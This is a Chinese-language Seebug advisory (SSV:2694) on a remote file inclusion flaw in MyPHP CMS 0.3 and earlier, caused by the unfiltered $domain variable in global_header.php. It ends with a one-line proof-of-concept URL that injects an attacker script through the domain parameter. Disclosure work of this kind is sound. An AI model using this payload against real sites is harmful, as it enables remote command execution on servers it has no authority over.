MyPHP CMS global_header.php远程文件包含漏洞

2007-12-26T00:00:00
ID SSV:2694
Type seebug
Reporter Root
Modified 2007-12-26T00:00:00

Description

BUGTRAQ ID: 18834

MyPHP CMS是基于PHP的开放源码内容管理系统。

MyPHP CMS实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

在MyPHP CMS的global_header.php文件中没有正确地检查过滤$domain变量,如果register_globals=on的话,远程攻击者就可以利用简单的PHP代码注入脚本执行任意命令。

MyPHP CMS <= 0.3 MyPHP CMS


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://sourceforge.net/projects/myphpcms target=_blank>http://sourceforge.net/projects/myphpcms</a>

                                        
                                            
                                                http://www.site.com/[path]/styles/default/global_header.php?installed=23&amp;domain=[Evil_Script]